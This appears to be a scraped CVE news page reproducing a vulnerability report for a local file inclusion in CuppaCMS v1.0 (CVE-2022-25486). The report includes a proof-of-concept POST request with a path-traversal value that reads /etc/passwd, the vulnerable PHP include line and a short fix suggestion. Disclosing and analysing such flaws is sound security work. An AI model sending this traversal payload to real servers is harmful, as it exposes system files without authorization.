CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.

Product version:cuppaCMS v1.0 http://cuppacms.com/files/cuppa\_cms.zip

**poc**

    POST /alerts/alertConfigField.php
    urlConfig=../../../../../../../../../../../../../../etc/passwd
    

![image](https://user-images.githubusercontent.com/38547290/154229228-9fd38bfd-af68-4231-961d-9ef10880556e.png)

**analysis**

location: /alerts/alertConfigField.php line 77  
![image](https://user-images.githubusercontent.com/38547290/154229347-e0521d71-4030-4dca-9227-a605f89558a1.png)  
`<?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>`  
and $cuppa->POST

           // post
        public function POST($string){
                    return $this->sanitizeString(@$_POST[$string]);
           }
    

go on

          public function sanitizeString($string){
                    return htmlspecialchars(trim(@$string));
                }
    

so the post urlConfig without any lfi protected filter

**Repair suggestions**

you can check urlConfig ,for example check if it has .. then refuse this request

CVE-2022-25486: Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php · Issue #25 · CuppaCMS/CuppaCMS

Headline

CVE-2022-25486: Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php · Issue #25 · CuppaCMS/CuppaCMS

CVE: Latest News